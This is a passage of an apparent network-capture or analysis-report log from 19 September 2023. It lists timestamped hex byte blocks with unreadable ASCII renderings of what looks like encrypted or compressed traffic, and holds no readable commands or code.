92 98 99 9b b7 d8 68 8a 5a 4a 4f 76 39 08 a2 34 21 71 27 c0 67
                                                                          Data Ascii: U#gCA{2@N!'7><h])D<aEeiO{<c8S6}+D^<P%5^%Jrt4s4F{Yy?L8goAyDo~T<.n[i?OkKG5W2kY[IFAh/ZL6*X<6hZJOv94!q'g
                                                                          2023-09-19 07:21:50 UTC69INData Raw: aa f7 f2 01 3e 1a c6 57 2d 22 f4 e9 e6 78 ac 7e 01 19 a7 41 6e 13 d5 ca 36 7b 37 56 0f 11 36 12 ae 57 b6 4d 73 db a7 86 01 d4 a0 9e 62 ef c7 8f 7e b8 d0 1e ea 7d 44 3d a0 e3 5c 1f 32 c5 7e 83 33 00 4c 2d a8 f1 c4 7c 40 1f 49 b3 5a 9c 83 a1 d9 96 34 44 53 e9 20 3a 22 9c 7f 13 9f d6 30 ce f6 e5 4e 4c 6d d3 f5 7d 98 4d ca ff 03 01 01 7f d6 74 cc 51 5d cf 64 a4 13 d1 a1 23 7d 5f 65 57 22 7f 23 58 5c d0 f5 23 d6 7a 5b 89 4b c3 f1 1e ce cd 4c 87 22 5f 5b b1 d7 76 9a 67 08 dc c5 97 a9 7a 44 75 c6 69 5f 5e 5b d3 ec 74 dd 6f fd 1d 56 46 7a f6 85 b2 78 c9 ce fe 6a 7a 46 78 0b 84 d7 b7 9a 1a 63 58 92 4f 12 7c eb ad 5a 93 fe 14 2a 16 d6 9e 63 40 14 dd b5 60 09 a6 04 f2 d4 56 0e 75 31 d9 17 81 aa 98 3d e7 bd c8 b9 c7 e0 51 b8 f5 7d 48 8a c5 9a 53 1e d4 f7 45 40 63 51
                                                                          Data Ascii: >W-"x~An6{7V6WMsb~}D=\2~3L-|@IZ4DS :"0NLm}MtQ]d#}_eW"#X\#z[KL"_[vgzDui_^[toVFzxjzFxcXO|Z*c@`Vu1=Q}HSE@cQ
                                                                          2023-09-19 07:21:50 UTC74INData Raw: 3c c8 b4 33 d4 22 10 cb 83 39 88 b7 8b b7 a6 30 2a d3 ee b5 7f 92 b5 33 cf 9c b7 dc 1c 99 1b b3 e1 16 bb a2 92 f4 18 c1 4a 86 2f bb be c8 1d bb f9 67 c6 d1 7e 99 bd 72 a9 49 06 f6 87 08 0a b4 f0 11 ae 61 e2 55 ae 88 11 01 8e 3d 9e 5b 16 5e 15 1e f9 a7 63 ec 6f bd d6 14 74 40 44 dd e1 6d 00 37 7a 66 b7 4a 31 e0 e9 f4 c6 f5 f5 de 14 fc 47 da 6b 80 f9 96 b6 7c 08 a0 fd 95 94 60 92 11 79 08 75 2f e2 4c e0 b7 20 e7 90 59 a9 dc 3e dc 38 bb 4b 24 57 b6 36 03 2e e8 4a ed b6 fb bc c2 dc 03 71 19 3a b0 ee 1a d8 d2 5c 64 b3 7d 01 ce 66 b3 68 cf 52 fa 97 36 36 c1 4b ed cc ee e3 d2 44 78 73 4e 28 be fa 13 c3 4c 9f 13 b7 da 37 7c 57 32 4c 8d 17 4e 53 49 98 73 c3 d2 ee af d7 93 02 6b 87 d2 5c fd f6 28 b5 b5 75 25 4b c1 ba 13 d3 ea c0 fc 61 41 73 ee de d7 8c 3a bb ef 09
                                                                          Data Ascii: <3"90*3J/g~rIaU=[^cot@Dm7zfJ1Gk|`yu/L Y>8K$W6.Jq:\d}fhR66KDxsN(L7|W2LNSIsk\(u%KaAs:
                                                                          2023-09-19 07:21:50 UTC78INData Raw: 0d 97 e2 bd 5d 72 5c e3 b8 6d b5 f7 57 69 92 2b 9a d2 4b 30 cd 93 fe ba 57 87 b5 68 64 a1 9b 6c 33 ee d5 cb ed 3c 89 06 da 36 2c aa 04 37 81 e8 27 5c 0b e9 01 6d 8e 14 5d 90 a4 8b ae bf 76 77 62 ca 21 7d 9d 0e cd 6c 82 3b e9 60 48 e5 bb 78 a7 fc 1b d4 56 75 87 a1 ab 92 84 42 50 48 23 af 86 30 3b b4 cb 93 85 1b 7d 73 2c 39 47 0c b2 42 22 a2 2a 79 96 a8 de 5a f9 aa eb 6a b6 be c9 c4 a5 6a 7b 62 a1 b1 5a e9 a4 24 9c 1c 26 72 5b d1 a8 ae 91 2f 1f d6 25 7a d6 06 6a ef 4b 3d 8f d4 ac 95 b4 52 8e d7 99 87 c5 59 77 1a 6d b6 15 99 24 4e 33 79 b4 dc 9d 3d f1 be 46 8b 8e 5d dc 93 46 8a b0 b5 ed 4e fd 15 8f c6 cc be fb ca 5f 78 c3 da ab 4f 7a de db 23 63 5e c9 cd c9 5b 44 21 54 72 de 08 e4 2d c1 a5 c6 d5 c3 db de b4 44 68 91 fb d5 ec 30 34 db e0 c3 3f 07 77 91 93 1e
                                                                          Data Ascii: ]r\mWi+K0Whdl3<6,7'\m]vwb!}l;`HxVuBPH#0;}s,9GB"*yZjj{bZ$&r[/%zjK=RYwm$N3y=F]FN_xOz#c^[D!Tr-Dh04?w
                                                                          2023-09-19 07:21:50 UTC82INData Raw: a4 0e 1f 6c 11 55 53 22 3c d7 3b 0d d9 53 53 2a 40 70 26 a4 d2 e9 f7 5a ae 39 a2 d1 fb c0 ec 1d 0b cb e1 76 a3 1d 9e d1 77 06 bb 8d 77 dc e7 1b cc 8d 72 16 d3 38 58 4e f7 4a 57 75 30 aa d6 9a 28 fd b2 93 e4 85 67 fb ce a3 2b af b5 d8 b6 94 e9 9e 72 7f 4d e6 e6 5b f3 c0 e6 ec b7 05 9e 55 34 a1 e1 d9 91 2a 1f 18 f9 60 f9 c9 fe ec 55 9f 0a d0 a8 1c e5 e3 0c d3 54 01 01 b1 c6 6e 46 10 80 e3 42 57 e5 5b 3e a3 2e f1 5d cc 47 f5 ab e4 1e 6e b7 b5 b8 ff 80 15 c4 bc 03 20 9c 33 6f 92 32 d8 9f c5 28 6e 89 07 e2 47 7d 90 8e f6 b8 e9 1b b4 8f 6c 9d 0b b7 0a b8 03 c8 f3 7e d3 54 4e 5d de c1 ef e7 67 8f 4b 0d 94 93 0a 4a 99 a8 5c 8d 42 9d 21 0a cb 97 6f 92 18 c2 b9 7d b5 d2 b3 32 9c 1a 3a b4 4d 98 bb b6 de 98 be 11 f8 01 3b e5 41 2f 1d 3d 3c 9a 3c 3a 2d a8 b5 96 ca 51
                                                                          Data Ascii: lUS"<;SS*@p&Z9vwwr8XNJWu0(g+rM[U4*`UTnFBW[>.]Gn 3o2(nG}l~TN]gKJ\B!o}2:M;A/=<<:-Q
                                                                          2023-09-19 07:21:50 UTC86INData Raw: 15 58 0b 0a a4 ad 01 da df b7 d2 a0 c4 f3 e7 a7 cc e5 ed db 59 bf 28 96 bf 7c e0 c1 44 e0 1b c6 15 04 3d e9 91 f2 69 af 0f 03 c2 db 25 53 d9 0e d2 e2 16 8b 5b 8b 90 30 52 52 03 62 78 8f 61 ce 64 6d a7 9d 89 38 fa 50 87 ae 55 87 8d e8 91 7e 54 1b b9 5b a1 77 2f 99 c5 58 dc e9 39 7e 11 e6 be c7 ae 92 71 6a 02 dc f4 ab 69 4a 6e 76 df 14 01 b1 2a a2 47 b0 2a e1 b1 23 25 c2 b8 3e 87 e5 35 d0 ab 79 56 e4 6b 14 d4 b3 0a 72 1f a8 a0 29 41 0e f7 2f 47 0c 35 8f 5b 8a 39 e9 a9 72 92 ea f5 e5 c9 ce 30 df 6f 03 2c 4e 9c 13 77 03 89 e8 3f 3b 3e 8c 88 40 93 40 f1 0f 43 f5 7d 62 f3 6d 83 00 47 dd 65 d0 8f a0 0e 04 ef dd 3f 02 a1 d8 53 b1 2e 8f 8d 1d 94 cd 4d 4d 4b f6 8d eb 89 2f d4 8c 21 f7 c3 db 00 89 10 30 45 ab 8b d5 68 2b 9e 0a e7 c5 ce 32 b8 3d c3 48 17 bd 40 d8 6a
                                                                          Data Ascii: XY(|D=i%S[0RRbxadm8PU~T[w/X9~qjiJnv*G*#%>5yVkr)A/G5[9r0o,Nw?;>@@C}bmGe?S.MMK/!0Eh+2=H@j
                                                                          2023-09-19 07:21:50 UTC90INData Raw: 68 b9 52 be d5 40 b9 32 10 1a 57 81 15 88 d9 0b e4 7b 4e a8 65 32 cc 79 11 87 c8 2e 3f 9e 62 1a ff 5d 3a b0 06 cf e5 f5 23 31 c1 d3 09 79 08 3e f0 8c e2 cb 33 4c d0 7b 8a 5f 77 55 3f be fa ec 69 d8 8a 2a 3f 00 d8 3a 51 ac 2c b5 73 8b 6e ee b4 9c 5e 9e aa bf 16 7b fa 86 83 69 24 c9 a2 af c9 eb 97 69 12 6f cc 35 c7 e6 36 a6 b5 9c ef 95 af 4a 92 05 b8 91 34 b3 50 c4 a0 c8 ff a3 6f a7 b5 70 96 05 5a 13 90 ee 02 dc db a0 9a 4e 55 b8 dd 48 00 51 cf 76 d0 8d 07 c9 15 a6 71 9d e7 c7 81 d7 9a 02 11 d3 0c d0 3c eb df 87 91 ff fe 52 09 62 c2 7d 3e fe 46 1f b2 f6 46 37 c5 2b 34 09 93 69 34 5c ac d8 e9 a0 76 18 16 a3 ca c7 48 64 21 07 34 8a c5 97 34 52 56 99 ee ab 8a 5c a6 92 94 53 67 d5 c2 84 bd 45 93 d7 0c 6c 68 68 52 5b 85 5d e9 fb 6f 20 f3 13 b0 8f dc 08 12 b2 8a
                                                                          Data Ascii: hR@2W{Ne2y.?b]:#1y>3L{_wU?i*?:Q,sn^{i$io56J4PopZNUHQvq<Rb}>FF7+4i4\vHd!44RV\SgElhhR[]o
                                                                          2023-09-19 07:21:50 UTC94INData Raw: dc 31 78 c8 f8 15 09 67 1a 17 7e 36 ba 4f 2d d2 67 c5 0e 18 33 25 34 9e 26 af dd 82 1a 05 3d 24 1e f1 3b 30 1d 49 8e 85 0e 05 c7 65 90 4c 3a 84 f1 52 7f 9c 5c 84 64 cc ac c6 17 38 a8 6f fa 96 cb 95 5c b7 ab 79 56 32 94 6c 3f 45 be 39 07 ca d7 9d c6 2f 6e 57 12 ef 76 02 8b 9e c0 5f 0a ad fa a1 89 6d ed 0b 9a 62 02 04 94 28 19 ed f4 a9 04 ef e2 d5 7d a2 97 20 69 5b 6c 13 74 bd 46 fd d5 d6 46 56 b7 c9 5d ee 6f f7 76 6a e5 48 ab b1 ad 8a 80 64 62 6d 9f 1a 8c 6b be c2 0b 5a af cc e4 eb e8 e3 88 79 88 66 fa 45 3d fc 92 08 12 27 a7 05 41 db 2c f3 eb 32 f5 9c f0 c5 6c f1 01 5b d0 e2 b5 4e 0f de ac 73 c5 2b 72 1a 04 fd a6 9c 4b 55 f1 a8 c2 5b 4b 1b 6a 24 d7 88 77 d3 6c dd e9 80 d2 15 1a d5 96 0e 1a c6 f6 28 0b 87 b3 19 22 bb 21 88 16 dd 54 54 c5 d9 ce 10 62 4d 3e
                                                                          Data Ascii: 1xg~6O-g3%4&=$;0IeL:R\d8o\yV2l?E9/nWv_mb(} i[ltFFV]ovjHdbmkZyfE='A,2l[Ns+rKU[Kj$wl("!TTbM>
                                                                          2023-09-19 07:21:50 UTC97INData Raw: ac 66 d3 99 58 6e 97 8b 8f d8 f6 cf cf bc 8f 23 ce 6e a0 24 3b 80 f1 3b c5 e7 10 24 64 e0 4a a7 a0 c4 3e 9e e7 41 54 71 dc bd 2c 46 c4 c4 5d 97 33 9d 3b 43 40 ca 6e 4f e6 a8 70 ee 83 9c ef c7 47 45 b2 44 e7 7e 98 4d 29 2f e8 b4 48 02 95 7a d9 f2 37 6d ea c3 39 42 b3 9f 19 ea c7 9a df 58 76 88 37 4d a0 3b 6d 89 3c 34 aa f5 09 20 dd d2 e8 3f 8c 3e 4a f0 d5 b8 f3 88 47 39 78 4e c4 97 2e ba 91 91 6d d6 4d 23 4b 54 b0 b8 b5 83 4e f4 d2 1b a5 09 0c 16 27 ec f0 20 bc d6 35 6e 78 14 8b ce e9 76 b9 c1 6b 43 87 14 fe fd d0 f4 f6 6d d9 10 8c ed 27 84 b8 d7 3f f8 86 dc c7 52 76 00 bc 4d 41 8e 6c 87 92 98 3c 65 db 01 b4 c5 26 ed 3a 18 d3 de 1a 2c cb 9a 12 b1 ab d1 b8 08 e1 f4 d9 62 6d bf 15 a1 04 a8 e3 0e 07 b6 94 2b af 8c b3 14 42 7c 8f a8 3e 06 fa ea d3 37 9f dc 27
                                                                          Data Ascii: fXn#n$;;$dJ>ATq,F]3;C@nOpGED~M)/Hz7m9BXv7M;m<4 ?>JG9xN.mM#KTN' 5nxvkCm'?RvMAl<e&:,bm+B|>7'
                                                                          2023-09-19 07:21:50 UTC101INData Raw: 37 60 89 fd 3c c2 96 48 39 9d 2b 74 d3 16 c2 e0 ba b5 d2 3d f3 84 46 ab c3 8c 7d cf 29 f2 66 8c 82 e1 1f 33 3f e3 64 91 96 b0 26 d4 b7 3c 9a 23 dd 8e 93 a4 8a 6d 00 8b 4b 0e a3 78 01 71 11 a1 a5 da d7 6c b2 09 ec bc 7c b2 62 2e ef ee 59 28 61 a0 e4 c2 06 da 56 2a 2f 05 d1 ea 2b 1b 59 dc fe 93 7b 74 92 10 cf dd 0b 72 41 b0 13 5c 1b a1 6e 26 19 26 d9 6a 81 f3 f3 ba 12 14 e9 9f 63 aa 8d 95 78 53 7d dc 50 61 07 63 28 27 2a fd 7e f8 e2 dd c2 c8 25 37 25 65 fe b2 fe 15 30 45 47 a7 39 61 61 0b c6 f0 bf d0 85 df 04 bf e1 6c 22 90 9c 3e 09 b9 fc f3 3f fa 60 64 5e f7 c4 69 54 77 1a 3c e0 d6 6c 2e 79 06 bb 4d 29 f8 39 00 a9 72 90 9f 41 56 42 f8 33 cd 04 6f ad 47 38 13 01 f4 fa 8b 69 2a ff d1 cb ba 10 bf 55 7b 70 81 19 22 87 44 90 17 9b 5c 5e 0f 7a a4 df 54 b5 53 99
                                                                          Data Ascii: 7`<H9+t=F})f3?d&<#mKxql|b.Y(aV*/+Y{trA\n&&jcxS}Pac('*~%7%e0EG9aal">?`d^iTw<l.yM)9rAVB3oG8i*U{p"D\^zTS
                                                                          2023-09-19 07:21:50 UTC106INData Raw: 79 ed 68 76 c1 12 70 43 9b 5d 34 1e 99 8b 8c bb 81 46 85 4e d2 29 9e 4e e0 22 c0 aa e9 3f ad eb d5 86 03 e6 ea 17 66 2a 60 c4 c0 b4 63 df c8 48 d9 55 92 c5 7d 60 2a 7c a4 e7 24 73 97 cd ac 77 28 1c 81 3b 3c 5b 54 51 18 f9 cf 28 9f 2e 52 18 02 af 54 fe ef 2a 36 88 c5 ad d8 c0 52 43 89 8b 6d 2a c8 15 da f8 0d df b5 2f b3 8a 1f d8 22 2c 38 74 21 1a 26 2a 36 bf ca 36 ea 0f 60 24 19 c1 3a 9e ed 8c 23 f5 7e 49 aa e3 11 d8 3e 9b 64 18 17 a3 a9 f2 44 e3 af 98 a3 cb d3 3e 51 fa 70 97 10 41 b9 63 f1 c3 0c 84 43 a7 11 6f 11 21 a5 53 72 23 47 02 b8 2d 34 e2 db 7b a0 62 be 7e ca 0a d7 2b aa b2 97 9a 8e 2a fd ff a7 2b d4 c9 5c 21 a8 22 f3 82 f6 e7 f3 a1 26 09 e6 70 07 72 c6 b5 eb f9 34 d3 03 f5 88 bd 79 00 b0 d8 5b 57 2b 3c 2d e0 3e 91 21 5b 2a fd 5b 99 02 4a ec 04 00
                                                                          Data Ascii: yhvpC]4FN)N"?f*`cHU}`*|$sw(;<[TQ(.RT*6RCm*/",8t!&*66`$:#~I>dD>QpAcCo!Sr#G-4{b~+*+\!"&pr4y[W+<->![*[J
                                                                          2023-09-19 07:21:50 UTC110INData Raw: e7 d4 16 ef da 00 9f 78 73 c6 2c 87 fd 3d cf 19 1e d2 78 28 33 10 4d 7d ef 0f 6b 96 64 69 aa 8c 53 89 e5 a4 59 ca 4e 39 1b f6 1b d9 83 55 7e 14 f1 ed bd c6 41 26 70 de 9b 0f 8b 8d 8f ae e8 9f a2 b0 b8 38 b9 07 b0 2c 55 2c 8c a9 aa 4c 8a 3d 4a 77 92 42 7b d4 1f 32 f1 bb 00 db 8c 46 8b 34 f8 33 35 7d 16 10 90 02 27 4c ec be 27 02 f9 06 bd 63 29 a3 da 80 60 7c 65 1b ec ae fd 18 4a 7f 50 a0 62 bf 44 9d f5 80 8b 65 c2 eb d4 a5 61 08 74 e0 6e 36 56 76 e6 3a 9a 07 37 9e 71 17 68 d0 d6 cd d5 79 b9 81 aa 8e 3b 30 fb 13 f0 37 3b 1c de 86 35 cd 64 75 0b f1 f8 db 61 f7 9b 0d ec 0c ee 30 fa b5 28 71 01 b8 23 39 85 c5 da 90 83 73 02 64 72 45 e5 e0 f0 d9 98 4a f6 e2 d2 f3 c9 1b 66 e2 f6 f3 fd 73 d7 f8 37 f8 2e 3d 5c 32 55 ec 4c 7c eb bd 10 4f 27 d6 f7 34 ce 44 d9 87 43
                                                                          Data Ascii: xs,=x(3M}kdiSYN9U~A&p8,U,L=JwB{2F435}'L'c)`|eJPbDeatn6Vv:7qhy;07;5dua0(q#9sdrEJfs7.=\2UL|O'4DC
                                                                          2023-09-19 07:21:50 UTC114INData Raw: 1d 90 b8 66 5d 6e 6c eb eb 72 7f 1b 67 e5 5a 38 4d b8 02 e7 26 2e 04 b8 b5 f0 ae 7d 59 54 d1 4e 98 fd 71 3a aa 79 dd 6d 98 11 cf ca de e0 fd 42 f8 15 68 82 c0 f3 b2 5a 8a e1 2b e8 79 10 1f e4 7d d5 a8 32 4d 03 95 76 7a 95 9f b8 a0 53 4e 64 b6 b7 36 c1 b1 12 46 bc 76 cc 61 dd dc 71 ab f6 db 00 a9 87 5b 33 cf 14 fe 6a 9b 8f c1 e9 69 34 df fa 88 e0 f5 f0 87 23 b9 ed d2 91 ca 2a e2 a0 de bb b1 cb 2c a4 e0 a6 fd 33 7d 2b db 5b 30 0f b4 4a b4 75 e2 3e e9 75 ed 53 db 74 06 6d 2d 65 5c 34 a0 7d 23 8f e9 87 da a5 76 8b 09 64 94 0e d1 61 1f 88 f7 18 f8 23 30 3a 2d 65 d1 71 5e 43 f8 af ea 8a 01 8d 5e c7 d2 a9 2a 03 45 ee d1 06 0d 76 3d e6 54 12 a4 e6 01 e1 a9 d7 c1 14 8c c7 15 6a 93 a4 ad d5 2e f5 73 71 12 e2 ed 26 a0 3b a5 c7 e0 da 75 f5 10 33 08 62 1a 72 36 b2 a1
                                                                          Data Ascii: f]nlrgZ8M&.}YTNq:ymBhZ+y}2MvzSNd6Fvaq[3ji4#*,3}+[0Ju>uStm-e\4}#vda#0:-eq^C^*Ev=Tj.sq&;u3br6
                                                                          2023-09-19 07:21:50 UTC118INData Raw: c3 e3 a6 33 e8 8d 99 bd 60 13 af 26 d9 62 7a 6c 86 05 af 5b 25 c5 60 54 e7 58 ee 0f 43 bf 08 da bf 50 89 25 60 06 82 8f ab 07 16 b2 21 1a e7 46 a3 c4 38 a6 47 c5 10 17 c6 da fa 1a b8 fe a0 ac 43 41 d8 e4 76 3b 2f f2 f2 37 e4 89 08 e6 d3 6e 7f a3 d2 f4 6f 4b e1 09 93 44 c2 e0 ff 0f 13 c8 51 26 79 e0 30 d6 c1 11 99 9c cf 82 63 20 1c cc 0f 93 f3 45 33 5c fc cf c7 a2 86 83 54 9f ab df 6f 25 01 0d f4 db 7f 0d 98 d0 03 e1 3f e3 d9 3e df cc de 62 6c e9 a1 48 64 d3 de a6 90 cd 20 28 4e dd 5f 51 61 51 a1 06 80 67 67 33 0e b8 c8 28 1b d1 ca 9c 58 a0 8c c2 3c 46 b9 8b c4 73 23 1b fc 91 e4 cf d6 fc 5d 36 4f bd 61 1d aa 19 86 ee b1 1a 2e d7 8c e7 ea 3f 7e 0b 7a 66 78 ad 11 58 38 c2 a2 0e 38 cc 77 28 ce 6f f3 a7 ee fd 3b 71 05 f0 ef fa 3c 6c 3e b0 14 92 a0 3d a4 1f 7d
                                                                          Data Ascii: 3`&bzl[%`TXCP%`!F8GCAv;/7noKDQ&y0c E3\To%?>blHd (N_QaQgg3(X<Fs#]6Oa.?~zfxX88w(o;q<l>=}
                                                                          2023-09-19 07:21:51 UTC122INData Raw: f0 b2 ea 9c e9 24 c7 ca eb 52 7a 76 36 ce 0a da f5 ef b2 4d 86 11 08 80 67 0d a7 29 94 b1 94 29 92 54 cf e1 28 ae 83 c7 80 90 d0 9c cc 2d d2 a2 a8 30 98 69 19 9e fc 78 c4 0d 81 83 5a 57 e2 55 3d b6 4b aa 6a 8f 65 23 34 fe bd f6 af ee c0 a4 f0 ad b3 d9 7e 58 c5 16 6a cd 81 62 5f c4 78 b3 c4 73 b5 3f 1b 3a 8b f4 c9 a6 a8 02 50 84 4f 50 7e be 21 bc 56 00 d0 c2 ae 1b c8 99 0a 3c b2 bc bc b4 18 e3 16 ce 13 01 c6 68 e2 a8 f3 4d 5a a5 da ad cb be cd 79 f0 5d 0f 2d b2 96 e2 26 eb b8 41 e4 2a f5 31 08 28 f4 f6 2d f3 8f 95 f3 60 55 19 9c 86 76 b0 ef c7 ad 60 57 cd 37 c1 31 0f ac 57 42 37 f2 b6 f2 82 be 91 09 43 27 10 13 1c 9a 98 e7 2a 12 e3 a3 a0 dc c5 a7 7e 84 47 59 f9 23 97 3c e4 cd 53 20 a9 07 c1 0b 50 54 ce b6 99 8a 8b a4 a5 81 3a 66 2d af 57 9b 26 7a 3c a3 23
                                                                          Data Ascii: $Rzv6Mg))T(-0ixZWU=Kje#4~Xjb_xs?:POP~!V<hMZy]-&A*1(-`Uv`W71WB7C'*~GY#<S PT:f-W&z<#
                                                                          2023-09-19 07:21:51 UTC126INData Raw: 13 36 9f 62 a4 61 62 05 05 65 1c dd 50 bc 0a 7b bb 19 11 c9 43 53 c9 33 31 d8 aa cb ab 40 46 cb be af 49 90 c1 bf 4e b1 5e d2 8b 88 55 48 35 8d 8c e2 a7 f0 3e 2f 5a de ff d2 c6 95 d2 07 52 37 d1 3a 86 44 07 34 0d 68 eb 7b 06 e7 51 f3 a7 68 54 9f 1d a6 fc 86 51 92 03 ac b6 02 ca 7c 38 64 1d 10 b0 b9 9f 45 52 fc 4f ce b7 ad 7b 49 ce 68 f6 0b 9c 2d 4f 9e 06 aa 99 e6 92 82 c4 07 54 b6 e7 27 d4 3e 0b be b7 52 21 34 f8 ef 07 22 e3 c1 1e 5b d5 c4 b2 af c1 81 9f 11 7e 71 5d b4 ab be 62 6c 19 04 86 1f 87 e8 83 f6 18 c9 ab c4 a5 51 d5 cf 77 7a 54 ef a7 b3 d6 93 90 ca 9f 0e 5d 7b f2 74 1b a1 a8 71 71 3b 21 5c a3 37 7b 33 a3 45 1e cb 51 92 dd a2 ba 12 e8 c7 cd f9 24 20 9b 36 38 8c 0e 96 27 a3 79 aa 06 91 7c 4e 9d 6e f6 9a 83 25 44 85 d2 35 99 d6 ef a5 55 e5 d5 a6 82
                                                                          Data Ascii: 6babeP{CS31@FIN^UH5>/ZR7:D4h{QhTQ|8dERO{Ih-OT'>R!4"[~q]blQwzT]{tqq;!\7{3EQ$ 68'y|Nn%D5U
                                                                          2023-09-19 07:21:51 UTC129INData Raw: 58 65 c8 95 aa d1 34 1a aa 11 0a f6 cc cb 0c 9c 2e d2 2a eb b8 f9 22 63 e0 21 23 60 d8 38 34 92 49 ca d3 eb 23 3e fc 4d c9 b6 46 27 b1 86 02 c1 99 1e 46 15 db 89 b3 62 d8 13 e2 a8 a7 ad 10 ab 9b b6 80 d2 7a 3e 56 30 14 e2 97 81 67 38 c8 dd 98 6c 2e c3 01 e1 fe d6 f5 16 1f 1a d6 83 7e cf df 0b de b2 36 58 43 b4 dd f5 fc d5 f2 34 f4 a0 4a ee f8 72 75 33 94 8e 3d 79 66 12 58 72 ea c0 59 29 3c d0 0b ab a5 89 9e b4 b6 28 73 ba ce 61 a5 0f 7a 70 3e 33 0e dd 32 1b 74 55 5d d2 a1 e7 8d 55 b6 15 15 63 2f 2b cc b2 d4 7f bf 61 49 52 32 21 0c 87 53 d7 48 1a a3 e8 a8 fd 65 7b 29 52 21 c3 f5 b0 c5 3b 00 55 28 89 ba 1c f2 2a 09 02 c3 13 d0 ae b0 48 68 97 ac 9d 56 40 f5 f9 17 4a 7f 26 9b d6 c7 b2 21 8e c5 2f a4 50 6a b0 b7 cb a6 60 4b 46 e4 a8 ef fa 58 65 b3 c7 43 a3 b4
                                                                          Data Ascii: Xe4.*"c!#`84I#>MF'Fbz>V0g8l.~6XC4Jru3=yfXrY)<(sazp>32tU]Uc/+aIR2!SHe{)R!;U(*HhV@J&!/Pj`KFXeC
                                                                          2023-09-19 07:21:51 UTC133INData Raw: e7 dc f1 f0 a8 83 68 c4 c8 74 b8 30 49 fb 5e f6 9a c2 38 83 b0 9b 2e 4d eb c1 63 08 ee 2b 77 55 7d 4a e2 6e a9 72 06 07 f6 48 3a 43 d9 89 9e ef b4 ac 6c 3e 52 96 65 5a 93 22 7c 94 07 0a 15 be 87 9f 8a 65 b8 1c 40 8c 74 1c cf 8c 7f 0c 90 6e 12 37 4d 3d b6 fa e0 20 0e 39 c8 f4 0f 5d 92 2d 97 d0 8e ed 4d 47 5a a9 a8 ea 65 4b 8b 49 48 5a b6 04 88 3e 26 56 58 12 cf da 7d 88 e6 28 e4 60 da eb e2 9c e2 62 27 39 e6 57 79 8a c0 a6 9c 72 08 be a5 c1 3f 86 2a 57 02 5e 20 fb fa 00 df ab bf f6 aa 84 76 31 a0 de 2b 1e 85 56 05 d4 c6 a1 48 3c 83 99 1b 97 c0 2e 4a 68 a9 c5 ac a6 a6 ff b7 90 e0 bb 73 a4 74 3d aa bb 4c 3f bd c3 77 c2 19 49 f6 dd aa 28 74 27 f7 19 65 6a fe 34 de ae f8 82 86 c3 48 e0 47 c9 64 e5 21 e5 ca 1e 27 54 87 8c 45 db b8 fb 73 7a e2 a6 b9 ed c7 48 3b
                                                                          Data Ascii: ht0I^8.Mc+wU}JnrH:Cl>ReZ"|e@tn7M= 9]-MGZeKIHZ>&VX}(`b'9Wyr?*W^ v1+VH<.Jhst=L?wI(t'ej4HGd!'TEszH;
                                                                          2023-09-19 07:21:51 UTC138INData Raw: 47 9b 4c 97 10 6c 73 04 1b 0f 98 4f 6f 40 8b da cb 20 84 1d 65 47 dd 03 61 87 f3 08 81 31 c9 a0 10 0f ad 7f 57 e5 cd 2c 62 51 59 a9 30 ac 3e a4 ca 29 c9 5c d5 98 ec 01 80 46 db 20 9b 2a 33 81 cf 72 74 13 f6 21 51 61 41 15 a7 7b 95 e1 12 1f 85 64 d7 4d 3c ce e3 21 3f 44 4c 91 0d 8d 2b 38 9b b5 bc 5f 3b 8d 50 b7 a1 5d 6c b8 ce a9 6c 78 75 8b 03 64 13 e4 99 76 ad 04 29 3b 41 7e 3b e2 06 eb da 91 89 ba c2 da 1e a7 bb 2c 43 37 3f 67 0e ab 76 08 91 c1 30 e0 c2 c0 32 ce 8a f5 a2 e6 bd b6 84 ec ad ba 31 67 f6 fd b4 19 28 19 df 5a 42 22 56 fa 11 c0 b2 d6 15 91 98 35 e4 d4 7f df 84 db c2 c0 a3 b3 0d b1 38 b9 8f d0 03 a5 fd b7 77 76 39 c1 e3 cf ac 87 6b c1 35 c8 7e 5f f9 e8 c7 8a 40 a6 48 12 c0 d3 52 e6 d7 49 e5 7b ac 2a 15 56 e0 83 63 b1 8a fc 53 e9 c6 fb 97 94 d7
                                                                          Data Ascii: GLlsOo@ eGa1W,bQY0>)\F *3rt!QaA{dM<!?DL+8_;P]llxudv);A~;,C7?gv021g(ZB"V58wv9k5~_@HRI{*VcS
                                                                          2023-09-19 07:21:51 UTC142INData Raw: 82 b3 1e 33 ce 31 53 c0 65 50 8d 15 c5 c0 c9 fd 29 49 26 c5 2d 97 5e 32 e8 27 82 0e ad 5c df 89 4d d4 8e db 0e 89 40 bf 62 ec 13 9e cf e2 9b 1e bc 06 62 20 76 eb 04 1b 2d 5f 56 ae f0 27 7a a2 19 37 8c 78 27 a2 32 42 3e 56 f8 e2 bb 13 9d 26 dc 9a 8d 3c 05 98 94 fd fc f3 5d f3 6f 6e e5 30 27 1c 51 6b 40 a6 52 44 e9 0c 6a b5 47 4f 0e e3 b2 be d0 69 89 fd e0 ca 98 1a 0a 09 71 e8 51 db 28 fd 6d f9 f0 6f 8b 07 0f 15 92 47 96 b5 43 3c ee 25 dd e7 77 b8 2c 0b 71 f1 60 d1 05 25 e2 f4 5b db b2 33 e1 1f a1 9c d4 40 80 bb 0b 80 0b e0 7d 45 fe 47 be 74 f8 59 50 e3 49 83 c7 44 13 28 18 db f9 b4 98 0b 5a 08 db 72 b0 17 da b3 20 a1 d0 f0 f9 de c4 e4 f4 69 58 42 f5 0a 72 4c 2e 77 e5 ea 06 da 2d d5 03 a5 19 f3 e7 c5 8c b9 e1 d2 13 d2 88 ea f1 c6 a6 29 c4 06 55 1b 07 c6 5d
                                                                          Data Ascii: 31SeP)I&-^2'\M@bb v-_V'z7x'2B>V&<]on0'Qk@RDjGOiqQ(moGC<%w,q`%[3@}EGtYPID(Zr iXBrL.w-)U]
